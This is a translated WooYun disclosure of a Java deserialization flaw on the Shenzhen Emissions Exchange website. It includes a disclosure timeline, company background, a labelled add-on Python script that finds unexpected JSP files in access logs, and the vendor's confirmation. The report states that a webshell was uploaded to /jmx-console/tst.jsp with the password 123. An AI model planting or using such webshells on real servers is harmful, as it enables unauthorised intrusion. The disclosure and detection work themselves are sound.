WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
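2016-01-05: Details reported to the vendor; awaiting vendor handling
2016-01-08: Vendor has confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and experts in related fields
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-20: Details disclosed to the public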
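On September 30, 2010, taking Shenzhen's selection as one of the first national low-carbon pilot cities as an opportunity, the Shenzhen Emissions Exchange (深圳排放权交易所, hereinafter "the Exchange") was established with the approval of the Shenzhen Municipal People's Government. With the support of the Shenzhen municipal government, the Exchange completed a capital increase and share expansion in April 2012, raising its registered capital from 15 million yuan to 300 million yuan and becoming the exchange with the largest registered capital among its domestic peers. The number of shareholders increased to nine. Shenzhen Yuanzhi Investment Co., Ltd., the professional capital-operations platform of the Shenzhen State-owned Assets Supervision and Administration Commission, became the largest shareholder. The other eight shareholders are: CGN Wind Energy Co., Ltd., Datang Huayin Electric Power Co., Ltd., Potevio New Energy Co., Ltd., Shenzhen Yantian Port Group Co., Ltd., Shenzhen Energy Group Co., Ltd., Shenzhen National High-Tech Industry Innovation Center, Shenzhen United Property and Share Rights Exchange, and Shenzhen Special Economic Zone Construction and Development Group Co., Ltd.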
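Open the official website http://**.**.**.**/; the location marked in the screenshot is vulnerable.
The address http://**.**.**.**/ has a "Java deserialization" vulnerability.
Upload a trojan directly to the server:
http://**.**.**.**/jmx-console/tst.jsp (password: 123)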
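A defender-side check for the situation above, where a JSP that does not belong to the console was reachable at /jmx-console/tst.jsp. This is an added example, not part of the original report: it scans access-log lines for JSP requests under /jmx-console/ that are outside a known-good baseline. The baseline set, the Common Log Format input and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: JSPs present in a clean copy of the console. Rebuild this set
# from a known-good copy of your own distribution before relying on it.
BASELINE = {"/jmx-console/index.jsp", "/jmx-console/displayMBeans.jsp",
            "/jmx-console/inspectMBean.jsp", "/jmx-console/displayOpResult.jsp"}

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def normalise(target):
    """Decoded path without query string or ;jsessionid-style path parameters,
    so equivalent spellings of one resource compare equal."""
    path = unquote(urlsplit(target).path)
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))

def unexpected_jsp_hits(lines, baseline=BASELINE, prefix="/jmx-console/"):
    """Return (client, time, method, path, status) for JSP requests under
    `prefix` whose path is not in the baseline. A 2xx status means the file
    was actually served and should be treated as an incident lead."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, when, method, target, status = m.groups()
        path = normalise(target)
        low = path.lower()
        if not low.startswith(prefix) or not low.endswith((".jsp", ".jspx")):
            continue
        if path not in baseline:
            hits.append((client, when, method, path, int(status)))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from the report.
SAMPLE = [
    '203.0.113.7 - - [05/Jan/2016:10:01:02 +0800] "GET /jmx-console/index.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Jan/2016:10:03:40 +0800] "POST /jmx-console/tst.jsp HTTP/1.1" 200 312',
    '203.0.113.7 - - [05/Jan/2016:10:03:55 +0800] "GET /jmx-console/tst.jsp;jsessionid=AB12?x=1 HTTP/1.1" 200 98',
    '198.51.100.9 - - [05/Jan/2016:10:05:00 +0800] "GET /jmx-console/%74st.jsp HTTP/1.1" 404 0',
    '198.51.100.9 - - [05/Jan/2016:10:06:00 +0800] "GET /index.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in unexpected_jsp_hits(SAMPLE):
        print(hit)
```

Any hit with a 2xx status warrants comparing the deployed console directory against a clean copy of the archive, since the log only shows that the file was served, not how it got there.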
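Strengthen security awareness.
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2016-01-08 10:55
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: medium; attack cost: low; impact: medium; overall rating: medium, rank: 5. We are contacting the organization that administers the website to handle it.
None yet.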